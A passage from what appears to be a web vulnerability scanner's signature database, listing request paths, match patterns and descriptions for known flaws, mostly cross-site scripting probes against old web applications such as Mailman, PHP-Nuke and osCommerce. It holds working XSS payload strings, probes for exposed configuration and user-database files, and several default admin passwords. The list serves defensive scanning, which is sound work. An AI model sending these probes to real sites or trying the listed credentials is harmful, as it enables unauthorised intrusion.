CA-2000-02.\",\"\",\"\"\n\"000865\",\"0\",\"4\",\"/mailman/options/yourlist?language=en&email=&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;\",\"GET\",\"<SCRIPT>alert\\('Vulnerable'\\)<\\/SCRIPT>\",\"\",\"\",\"\",\"\",\"Mailman 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000866\",\"0\",\"4\",\"/mailman/listinfo/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02.\",\"\",\"\"\n\"000867\",\"2895\",\"4\",\"/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\\\"Vulnerable\\\")</script>\",\"GET\",\"<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.\",\"\",\"\"\n\"000868\",\"9256\",\"4\",\"/launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.\",\"\",\"\"\n\"000869\",\"9257\",\"4\",\"/launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.\",\"\",\"\"\n\"000870\",\"4015\",\"4\",\"/jigsaw/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.\",\"\",\"\"\n\"000872\",\"5803\",\"4\",\"/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000873\",\"2739\",\"4\",\"/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; \",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000874\",\"50552\",\"4\",\"/index.php?file=Liens&op=\\\"><script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000875\",\"0\",\"4\",\"/index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000876\",\"0\",\"4\",\"/index.php?action=storenew&username=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.\",\"\",\"\"\n\"000877\",\"0\",\"4\",\"/index.php?action=search&searchFor=\\\"><script>alert('Vulnerable')</script >\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000878\",\"0\",\"4\",\"/index.php/\\\"><script><script>alert(document.cookie)</script><\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000879\",\"50553\",\"4\",\"/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000880\",\"50553\",\"4\",\"/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000881\",\"17160\",\"4\",\"/include.php?path=contact.php&contact_email=\\\">&lt;script&gt;alert(document.cookie);&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHPKIT is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000882\",\"0\",\"4\",\"/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000883\",\"0\",\"4\",\"/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000884\",\"0\",\"4\",\"/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000885\",\"2754\",\"4\",\"/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.\",\"\",\"\"\n\"000886\",\"2322\",\"4\",\"/gallery/search.php?searchstring=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.\",\"\",\"\"\n\"000887\",\"20234\",\"4\",\"/friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.\",\"\",\"\"\n\"000888\",\"2946\",\"4\",\"/forum_members.asp?find=%22;}alert(9823);function%20x()\\{v%20=%22\",\"GET\",\"200\",\"alert\\(9823\\)\",\"\",\"The\\sdocument\\shas\\smoved\",\"\",\"Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000889\",\"2739\",\"4\",\"/forums/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt; \",\"GET\",\"<script>alert\\(document\\.cookie\\)<script>\",\"\",\"\",\"\",\"\",\"Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000890\",\"31694\",\"4\",\"/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02.\",\"\",\"\"\n\"000891\",\"5043\",\"4\",\"/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"php(Reactor) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000892\",\"2530\",\"4\",\"/esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000893\",\"9231\",\"4\",\"/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02.\",\"\",\"\"\n\"000894\",\"59095\",\"4\",\"/downloads/pafiledb.php?action=rate&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\"\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000895\",\"59095\",\"4\",\"/downloads/pafiledb.php?action=email&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\"\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000896\",\"59095\",\"4\",\"/downloads/pafiledb.php?action=download&id=4?\\\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\\\"\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000897\",\"0\",\"4\",\"/download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.\",\"\",\"\"\n\"000898\",\"0\",\"4\",\"/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E\",\"GET\",\"<script language=javascript>window\\.alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000899\",\"0\",\"4\",\"/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E\",\"GET\",\"<script language=javascript>window\\.alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000900\",\"5043\",\"4\",\"/comments/browse.php?fid=2&tid=4&go=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000901\",\"0\",\"4\",\"/comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.\",\"\",\"\"\n\"000902\",\"50619\",\"4\",\"/cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script>\",\"GET\",\"<script>alert\\(1\\)<\\/script>\",\"\",\"\",\"\",\"\",\"RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000903\",\"50619\",\"4\",\"/cleartrust/ct_logon.asp?CTAuthMode=BASIC&CTLoginErrorMsg=xx&ct_orig_uri=\\\">< script>alert(1)/script><\\\"\",\"GET\",\"<script>alert\\(1\\)<\\/script>\",\"\",\"\",\"\",\"\",\"RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000904\",\"0\",\"4\",\"/chat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script>\",\"GET\",\"alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000905\",\"651\",\"4\",\"/cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000906\",\"651\",\"4\",\"/cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000907\",\"42015\",\"4\",\"@CGIDIRStest2.pl?&lt;script&gt;alert('Vulnerable');&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Default Monkey server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000908\",\"2257\",\"4\",\"/cgi-bin/.cobalt/message/message.cgi?info=%3Cscript%3Ealert%28%27alert%27%29%3B%3C/script%3E\",\"GET\",\"alert\\(\\\"alert\\\"\\)\",\"\",\"\",\"\",\"\",\"Cobalt RaQ Web Control Panel is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000909\",\"7022\",\"4\",\"/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05\",\"GET\",\"<script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"DCP-Portal v5.3.1 is vulnerable to  Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000910\",\"27096\",\"4\",\"/ca000007.pl?ACTION=SHOWCART&REFPAGE=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000911\",\"27097\",\"4\",\"/ca000001.pl?ACTION=SHOWCART&hop=\\\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000912\",\"27095\",\"4\",\"/bb000001.pl<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000913\",\"3850\",\"4\",\"/article.php?sid=\\\"><Img Src=javascript:alert('Vulnerable')><Img Src=\\\"\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpWebSite 0.8.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000914\",\"0\",\"4\",\"/article.cfm?id=1'<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"With malformed URLs, ColdFusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000915\",\"4765\",\"4\",\"/apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000916\",\"0\",\"4\",\"/anthill/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02\",\"\",\"\"\n\"000917\",\"0\",\"4\",\"/admin/login.php?path=\\\"></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000918\",\"2243\",\"4\",\"/addressbook/index.php?surname=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000919\",\"2243\",\"4\",\"/addressbook/index.php?name=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000920\",\"0\",\"4\",\"/add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\" 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000921\",\"0\",\"4\",\"/a?<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.\",\"\",\"\"\n\"000922\",\"54589\",\"4\",\"/a.jsp/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.\",\"\",\"\"\n\"000923\",\"38019\",\"4\",\"/?mod=<script>alert(document.cookie)</script>&op=browse\",\"GET\",\"<script>alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000924\",\"0\",\"4\",\"/<script>alert('Vulnerable')</script>.thtml\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\\.thtml\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000925\",\"0\",\"4\",\"/<script>alert('Vulnerable')</script>.shtml\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\\.shtml\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000926\",\"0\",\"4\",\"/<script>alert('Vulnerable')</script>.jsp\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\\.jsp\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000927\",\"0\",\"4\",\"/<script>alert('Vulnerable')</script>.aspx\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.\",\"\",\"\"\n\"000928\",\"59443\",\"4\",\"//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000929\",\"59442\",\"4\",\"//comment.php?mode=Delete&sid=1&cid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000930\",\"0\",\"4\",\"/&lt;script&gt;alert('Vulnerable');&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS) with HTML-encoded requests. CA-2000-02.\",\"\",\"\"\n\"000931\",\"0\",\"4\",\"/%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server.\",\"\",\"\"\n\"000932\",\"0\",\"4\",\"/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.\",\"\",\"\"\n\"000933\",\"0\",\"4\",\"/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.\",\"\",\"\"\n\"000934\",\"0\",\"4\",\"/%22%3cscript%3ealert(%22xss%22)%3c/script%3e\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Server allows Cross Site Scripting (XSS) in 301 error messages. This may be Falcon web server.\",\"\",\"\"\n\"000935\",\"9209\",\"4\",\"/%0a%0a<script>alert(\\\"Vulnerable\\\")</script>.jsp\",\"GET\",\"<script>alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Jetty JSP servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000936\",\"19772\",\"4\",\"@CGIDIRStitle.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"HNS's title.cgi is vulnerable to Cross Site Scripting (XSS CA-2000-02) in version 2.00 and earlier, and Lite 0.8 and earlier.\",\"\",\"\"\n\"000937\",\"21365\",\"34\",\"@CGIDIRScompatible.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000938\",\"0\",\"34\",\"/add_user.php\",\"GET\",\"output started at \\/\",\"\",\"\",\"\",\"\",\"DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000939\",\"0\",\"1\",\"@CGIDIRSprobecontrol.cgi?command=enable&username=cancer&password=killer\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from a scanner.\",\"\",\"\"\n\"000940\",\"0\",\"1\",\"@CGIDIRSretrieve_password.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May not be vulnerable, but see http://www.dcscripts.com/bugtrac/DCForumID7/3.html for information.\",\"\",\"\"\n\"000941\",\"0\",\"1e\",\"@CGIDIRSwwwadmin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Administration CGI?\",\"\",\"\"\n\"000942\",\"0\",\"1\",\"/cfdocs/expeval/displayopenedfile.cfm\",\"GET\",\"200\",\"\",\"not found\",\"\",\"\",\"Unknown vuln\",\"\",\"\"\n\"000943\",\"0\",\"1\",\"/cfdocs/expeval/sendmail.cfm\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Can be used to send email; go to the page and fill in the form\",\"\",\"\"\n\"000944\",\"22\",\"1ab\",\"/cgi-bin/bigconf.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Big-IP Configuration CGI\",\"\",\"\"\n\"000945\",\"0\",\"1b\",\"@CGIDIRSwebmap.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"nmap front end... could be fun\",\"\",\"\"\n\"000946\",\"0\",\"1b\",\"@CGIDIRSwwwwais\",\"GET\",\"UNISYS WEB SEARCH ENGINE\",\"\",\"\",\"\",\"\",\"Unisys web server wais search found.\",\"\",\"\"\n\"000947\",\"0\",\"1b\",\"/ammerum/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Ammerum pre 0.6-1 had several security issues.\",\"\",\"\"\n\"000948\",\"0\",\"1b\",\"/ariadne/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.\",\"\",\"\"\n\"000949\",\"0\",\"1b\",\"/cbms/cbmsfoot.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000950\",\"0\",\"1b\",\"/cbms/changepass.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000951\",\"0\",\"1b\",\"/cbms/editclient.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000952\",\"0\",\"1b\",\"/cbms/passgen.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000953\",\"0\",\"1b\",\"/cbms/realinv.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000954\",\"0\",\"1b\",\"/cbms/usersetup.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"CBMS Billing Management has had many vulnerabilities in versions 0.7.1 and below. None could be confirmed here, but they should be manually checked if possible. http://freshmeat.net/projects/cbms/\",\"\",\"\"\n\"000955\",\"0\",\"1be\",\"@CGIDIRSadmin/admin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio.\",\"\",\"\"\n\"000956\",\"0\",\"1be\",\"@CGIDIRSadmin/setup.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio.\",\"\",\"\"\n\"000957\",\"0\",\"2\",\"@CGIDIRSmt-static/mt-load.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog installation CGI found. May be able to reconfigure or reload.\",\"\",\"\"\n\"000958\",\"0\",\"2\",\"@CGIDIRSmt-static/mt.cfg\",\"GET\",\"configuration file\",\"\",\"\",\"\",\"\",\"Movable Type configuration file found. Should not be available remotely.\",\"\",\"\"\n\"000959\",\"0\",\"2\",\"@CGIDIRSmt/mt-load.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Movable Type weblog installation CGI found. May be able to reconfigure or reload.\",\"\",\"\"\n\"000960\",\"0\",\"2\",\"@CGIDIRSmt/mt.cfg\",\"GET\",\"configuration file\",\"\",\"\",\"\",\"\",\"Movable Type configuration file found. Should not be available remotely.\",\"\",\"\"\n\"000961\",\"143\",\"2\",\"/cgi-bin-sdb/printenv\",\"GET\",\"\\/usr\\/bin\\/perl\",\"\",\"\",\"\",\"\",\"SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf. BID-4431.\",\"\",\"\"\n\"000962\",\"0\",\"12\",\"/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This check (A) sets up the next bad blue test (B) for possible exploit. See http://www.badblue.com/down.htm\",\"\",\"\"\n\"000963\",\"59412\",\"23\",\"/db/users.dat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"upb PB allows the user database to be retrieved remotely.\",\"\",\"\"\n\"000964\",\"0\",\"3\",\"@CGIDIRScgiwrap/~@USERS\",\"GET\",\"UID of script 